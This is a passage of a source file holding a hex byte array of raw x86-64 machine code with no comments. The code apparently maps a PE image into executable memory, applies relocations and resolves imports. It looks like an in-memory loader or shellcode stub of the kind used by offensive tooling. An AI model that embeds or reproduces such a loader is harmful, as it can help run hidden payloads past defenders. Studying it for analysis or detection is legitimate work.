932 0x83, 0xbd, 0xd8, 0x02, 0x00, 0x00, 0x00, 0x74, 0x1a, 0x48, 0x8b, 0x85,
933 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0xf0, 0x00, 0x00, 0x00, 0x48,
934 0x8b, 0x85, 0xd8, 0x02, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48,
935 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x10, 0x01, 0x00,
936 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x02, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff,
937 0xd2, 0x48, 0x8b, 0x85, 0x00, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x10,
938 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x02, 0x00, 0x00, 0x48, 0x89,
939 0xc1, 0xff, 0xd2, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x68,
940 0x03, 0x00, 0x00, 0x5b, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83,
941 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b,
942 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x48,
943 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x00, 0x48, 0x8b,
944 0x50, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x89,
945 0xc1, 0xff, 0xd2, 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7,
946 0x40, 0x30, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
947 0x40, 0x38, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x48, 0x8b, 0x45, 0x18, 0x48,
948 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b,
949 0x45, 0x18, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89,
950 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x38, 0x00, 0x00,
951 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x85,
952 0xc0, 0x74, 0x2b, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48,
953 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
954 0x40, 0x28, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45, 0xfc, 0x48, 0x8b,
955 0x45, 0x18, 0x48, 0xc7, 0x40, 0x28, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
956 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x85, 0xc0, 0x74, 0x75, 0x48,
957 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x4c, 0x8b,
958 0x80, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x50,
959 0x20, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0xc1,
960 0x41, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
961 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x58, 0x48, 0x8b, 0x45,
962 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45,
963 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00,
964 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10,
965 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18,
966 0x48, 0xc7, 0x40, 0x10, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
967 0x48, 0x8b, 0x40, 0x20, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x48, 0x8b, 0x45,
968 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10,
969 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48, 0x89, 0xc1, 0xff,
970 0xd2, 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x20,
971 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x18,
972 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40,
973 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x18,
974 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45, 0xfc,
975 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x18, 0x00, 0x00, 0x00, 0x00,
976 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x85, 0xc0, 0x74,
977 0x2b, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00,
978 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08,
979 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45, 0xfc, 0x48, 0x8b, 0x45, 0x18,
980 0x48, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
981 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45, 0x18,
982 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b,
983 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x89, 0x45,
984 0xfc, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00,
985 0x90, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x57, 0x56, 0x48, 0x81,
986 0xec, 0x70, 0x05, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00,
987 0x00, 0x48, 0x89, 0x8d, 0x10, 0x05, 0x00, 0x00, 0x48, 0x89, 0x95, 0x18,
988 0x05, 0x00, 0x00, 0x48, 0xc7, 0x85, 0xb8, 0x03, 0x00, 0x00, 0x00, 0x00,
989 0x00, 0x00, 0x48, 0xc7, 0x85, 0xb0, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00,
990 0x00, 0x48, 0xc7, 0x85, 0x98, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
991 0x48, 0xc7, 0x45, 0x70, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x68,
992 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x05, 0x00, 0x00, 0x48,
993 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85, 0x90, 0x04, 0x00,
994 0x00, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x48, 0x05, 0x28, 0x05,
995 0x00, 0x00, 0x48, 0x89, 0x85, 0x88, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85,
996 0x88, 0x04, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80, 0x04, 0x00, 0x00, 0x48,
997 0x8b, 0x85, 0x80, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0,
998 0x48, 0x8b, 0x85, 0x88, 0x04, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89,
999 0x85, 0x78, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x05, 0x00, 0x00,
1000 0x48, 0x8b, 0x40, 0x40, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48,
1001 0x89, 0x85, 0x70, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x04, 0x00,
1002 0x00, 0x48, 0x89, 0x85, 0x68, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x68,
1003 0x04, 0x00, 0x00, 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85,
1004 0x70, 0x04, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x60, 0x04,
1005 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x0f, 0xb7, 0x50,
1006 0x04, 0x48, 0x8b, 0x85, 0x60, 0x04, 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x04,
1007 0x66, 0x39, 0xc2, 0x0f, 0x85, 0x84, 0x14, 0x00, 0x00, 0x48, 0x8b, 0x85,
1008 0x78, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x50, 0x89, 0xc0, 0x48, 0x89, 0x45,
1009 0x78, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b, 0x80, 0xb4, 0x00,
1010 0x00, 0x00, 0x89, 0x85, 0x5c, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x5c, 0x04,
1011 0x00, 0x00, 0x00, 0x0f, 0x95, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x85, 0x58,
1012 0x04, 0x00, 0x00, 0x83, 0xbd, 0x58, 0x04, 0x00, 0x00, 0x00, 0x75, 0x0f,
1013 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48,
1014 0x89, 0x45, 0x70, 0x48, 0x8b, 0x85, 0x10, 0x05, 0x00, 0x00, 0x0f, 0xb6,
1015 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x75, 0x5e, 0x48, 0x8d, 0x4d,
1016 0x78, 0x48, 0x8d, 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90,
1017 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x38, 0x48, 0xc7, 0x44, 0x24,
1018 0x30, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00,
1019 0x08, 0xc7, 0x44, 0x24, 0x20, 0x40, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc9,
1020 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x1f, 0x00, 0x0f, 0x00, 0x48,
1021 0x89, 0xc1, 0xe8, 0xca, 0x3b, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00,
1022 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x89, 0x57, 0x01,
1023 0x00, 0x00, 0xe9, 0xf1, 0x13, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x05,
1024 0x00, 0x00, 0x4c, 0x8b, 0x80, 0xb0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1025 0x10, 0x05, 0x00, 0x00, 0x48, 0x8d, 0x90, 0xfb, 0x05, 0x00, 0x00, 0x48,
1026 0x8d, 0x45, 0x10, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0xc7, 0x45, 0xe0,
1027 0x30, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xe8, 0x00, 0x00, 0x00, 0x00,
1028 0xc7, 0x45, 0xf8, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x10, 0x48,
1029 0x89, 0x45, 0xf0, 0x48, 0xc7, 0x45, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48,
1030 0xc7, 0x45, 0x08, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x45, 0x20, 0x48,
1031 0x8d, 0x4d, 0xe0, 0x48, 0x8d, 0x45, 0x38, 0x48, 0x8b, 0x95, 0x90, 0x04,
1032 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x58, 0xc7, 0x44, 0x24, 0x50, 0x00,
1033 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00, 0x00, 0x00,
1034 0xc7, 0x44, 0x24, 0x40, 0x40, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x38,
1035 0x01, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30, 0x01, 0x00, 0x00, 0x00,
1036 0xc7, 0x44, 0x24, 0x28, 0x80, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24,
1037 0x20, 0x00, 0x00, 0x00, 0x00, 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0xba,
1038 0x00, 0x00, 0x00, 0x80, 0x48, 0x89, 0xc1, 0xe8, 0xa7, 0x3c, 0x00, 0x00,
1039 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00,
1040 0x00, 0x0f, 0x88, 0xfd, 0x12, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x38, 0x48,
1041 0x83, 0xf8, 0xff, 0x0f, 0x84, 0xef, 0x12, 0x00, 0x00, 0x48, 0x8b, 0x45,
1042 0x38, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xe2, 0x12, 0x00, 0x00, 0x48, 0x8b,
1043 0x55, 0x38, 0x48, 0x8d, 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d,
1044 0x90, 0x04, 0x00, 0x00, 0x48, 0x89, 0x4c, 0x24, 0x38, 0x48, 0x89, 0x54,
1045 0x24, 0x30, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x01, 0xc7, 0x44,
1046 0x24, 0x20, 0x02, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00,
1047 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x1f, 0x00, 0x0f, 0x00, 0x48,
1048 0x89, 0xc1, 0xe8, 0x86, 0x3a, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00,
1049 0x00, 0x48, 0x8b, 0x45, 0x38, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00,
1050 0x48, 0x89, 0xc1, 0xe8, 0x19, 0x3b, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04,
1051 0x00, 0x00, 0x00, 0x0f, 0x88, 0x7a, 0x12, 0x00, 0x00, 0x48, 0x8b, 0x85,
1052 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x70, 0x48, 0x8b, 0x95, 0x90,
1053 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x50, 0xc7, 0x44, 0x24, 0x48,
1054 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x00, 0x00, 0x00,
1055 0xc7, 0x44, 0x24, 0x38, 0x02, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0x68,
1056 0x48, 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00,
1057 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41,
1058 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc2, 0xff,
1059 0xff, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x2a, 0x3a, 0x00, 0x00, 0x89,
1060 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00, 0x00,
1061 0x0f, 0x88, 0x08, 0x12, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x85,
1062 0xc0, 0x0f, 0x84, 0xfe, 0x11, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x05,
1063 0x00, 0x00, 0x0f, 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x74,
1064 0x5b, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x89, 0x45, 0x60, 0x48, 0x8b, 0x45,
1065 0x68, 0x48, 0x89, 0x45, 0x58, 0x48, 0x8d, 0x4d, 0x58, 0x48, 0x8d, 0x45,
1066 0x60, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24,
1067 0x28, 0x48, 0x8d, 0x95, 0x8c, 0x00, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24,
1068 0x20, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89,
1069 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x84, 0x3a, 0x00,
1070 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00,
1071 0x00, 0x00, 0x0f, 0x88, 0x94, 0x11, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78,
1072 0x04, 0x00, 0x00, 0x8b, 0x48, 0x54, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x8b,
1073 0x95, 0x88, 0x04, 0x00, 0x00, 0x41, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8,
1074 0x90, 0x32, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x0f,
1075 0xb7, 0x40, 0x14, 0x0f, 0xb7, 0xd0, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00,
1076 0x00, 0x48, 0x01, 0xd0, 0x48, 0x83, 0xc0, 0x18, 0x48, 0x89, 0x85, 0x48,
1077 0x04, 0x00, 0x00, 0xc7, 0x85, 0xac, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00,
1078 0x00, 0xe9, 0x91, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xac, 0x04, 0x00, 0x00,
1079 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1,
1080 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x48, 0x04, 0x00, 0x00,
1081 0x48, 0x01, 0xd0, 0x44, 0x8b, 0x40, 0x10, 0x8b, 0x95, 0xac, 0x04, 0x00,
1082 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48,
1083 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x48, 0x04, 0x00,
1084 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x14, 0x89, 0xc2, 0x48, 0x8b, 0x85,
1085 0x88, 0x04, 0x00, 0x00, 0x48, 0x01, 0xc2, 0x4c, 0x8b, 0x4d, 0x70, 0x8b,
1086 0x8d, 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xc8, 0x48, 0xc1, 0xe0, 0x02,
1087 0x48, 0x01, 0xc8, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc1, 0x48, 0x8b,
1088 0x85, 0x48, 0x04, 0x00, 0x00, 0x48, 0x01, 0xc8, 0x8b, 0x40, 0x0c, 0x89,
1089 0xc0, 0x4c, 0x01, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0xd4, 0x31, 0x00, 0x00,
1090 0x83, 0x85, 0xac, 0x04, 0x00, 0x00, 0x01, 0x48, 0x8b, 0x85, 0x78, 0x04,
1091 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x06, 0x0f, 0xb7, 0xc0, 0x39, 0x85, 0xac,
1092 0x04, 0x00, 0x00, 0x0f, 0x82, 0x55, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x55,
1093 0x70, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30,
1094 0x48, 0xf7, 0xd8, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x40, 0x04, 0x00,
1095 0x00, 0x83, 0xbd, 0x58, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x06, 0x02,
1096 0x00, 0x00, 0x48, 0x83, 0xbd, 0x40, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84,
1097 0xf8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b,
1098 0x80, 0xb0, 0x00, 0x00, 0x00, 0x89, 0x85, 0x3c, 0x04, 0x00, 0x00, 0x8b,
1099 0x95, 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0,
1100 0x48, 0x89, 0x85, 0xb8, 0x04, 0x00, 0x00, 0xe9, 0x9b, 0x01, 0x00, 0x00,
1101 0x48, 0x8b, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x08, 0x48,
1102 0x89, 0x85, 0xc0, 0x04, 0x00, 0x00, 0xe9, 0x53, 0x01, 0x00, 0x00, 0x48,
1103 0x8b, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x8b, 0x10, 0x48, 0x8b, 0x85, 0xc0,
1104 0x04, 0x00, 0x00, 0x0f, 0xb7, 0x00, 0x66, 0x25, 0xff, 0x0f, 0x0f, 0xb7,
1105 0xc0, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b, 0x40,
1106 0x50, 0x39, 0xc2, 0x0f, 0x83, 0x1d, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55,
1107 0x70, 0x48, 0x8b, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x8b, 0x00, 0x89, 0xc1,
1108 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x0f, 0xb7, 0x00, 0x66, 0x25,
1109 0xff, 0x0f, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc8, 0x48, 0x01, 0xd0, 0x48,
1110 0x89, 0x85, 0x30, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00,
1111 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0xa0, 0x75, 0x23,
1112 0x48, 0x8b, 0x85, 0x30, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b,
1113 0x85, 0x40, 0x04, 0x00, 0x00, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x30,
1114 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0xe9, 0xbb, 0x00, 0x00, 0x00, 0x48,
1115 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0,
1116 0xf0, 0x3c, 0x30, 0x75, 0x25, 0x48, 0x8b, 0x85, 0x30, 0x04, 0x00, 0x00,
1117 0x48, 0x8b, 0x10, 0x48, 0x8b, 0x85, 0x40, 0x04, 0x00, 0x00, 0x89, 0xc0,
1118 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x30, 0x04, 0x00, 0x00, 0x48, 0x89,
1119 0x10, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00,
1120 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0x10, 0x75, 0x27,
1121 0x48, 0x8b, 0x85, 0x30, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b,
1122 0x85, 0x40, 0x04, 0x00, 0x00, 0x48, 0xc1, 0xe8, 0x10, 0x0f, 0xb7, 0xc0,
1123 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x30, 0x04, 0x00, 0x00, 0x48, 0x89,
1124 0x10, 0xeb, 0x4b, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x0f, 0xb6,
1125 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0x20, 0x75, 0x23, 0x48, 0x8b, 0x85,
1126 0x30, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b, 0x85, 0x40, 0x04,
1127 0x00, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x30,
1128 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0xeb, 0x16, 0x48, 0x8b, 0x85, 0xc0,
1129 0x04, 0x00, 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x84, 0xc0,
1130 0x0f, 0x85, 0x28, 0x0e, 0x00, 0x00, 0x48, 0x83, 0x85, 0xc0, 0x04, 0x00,
1131 0x00, 0x02, 0x48, 0x8b, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x04,
1132 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x48, 0x01, 0xd0,
1133 0x48, 0x39, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x0f, 0x85, 0x8a, 0xfe, 0xff,
1134 0xff, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x48, 0x89, 0x85, 0xb8,
1135 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x8b, 0x8d, 0x3c, 0x04, 0x00,
1136 0x00, 0x8b, 0x95, 0x5c, 0x04, 0x00, 0x00, 0x48, 0x01, 0xca, 0x48, 0x01,
1137 0xd0, 0x48, 0x39, 0x85, 0xb8, 0x04, 0x00, 0x00, 0x73, 0x12, 0x48, 0x8b,
1138 0x85, 0xb8, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x04, 0x85, 0xc0, 0x0f, 0x85,
1139 0x34, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b,
1140 0x80, 0x90, 0x00, 0x00, 0x00, 0x89, 0x85, 0x3c, 0x04, 0x00, 0x00, 0x83,
1141 0xbd, 0x3c, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xaa, 0x01, 0x00, 0x00,
1142 0x8b, 0x95, 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01,
1143 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x04, 0x00, 0x00, 0xe9, 0x7f, 0x01, 0x00,
1144 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x0c, 0x89,
1145 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x28,
1146 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x28, 0x04, 0x00, 0x00, 0x48, 0x89,
1147 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00, 0xe8, 0xe1, 0xd9, 0xff,
1148 0xff, 0x48, 0x89, 0x85, 0x20, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8,
1149 0x04, 0x00, 0x00, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48,
1150 0x01, 0xd0, 0x48, 0x89, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85,
1151 0xd8, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x10, 0x89, 0xc2, 0x48, 0x8b, 0x45,
1152 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xe0, 0x04, 0x00, 0x00, 0x48,
1153 0x8b, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0,
1154 0x0f, 0x84, 0xf9, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x04, 0x00,
1155 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x79, 0x3d, 0x48, 0x8b, 0x85,
1156 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85,
1157 0x20, 0x04, 0x00, 0x00, 0x41, 0x89, 0xd1, 0x41, 0xb8, 0x00, 0x00, 0x00,
1158 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00, 0xe8,
1159 0x56, 0xd6, 0xff, 0xff, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xe0, 0x04,
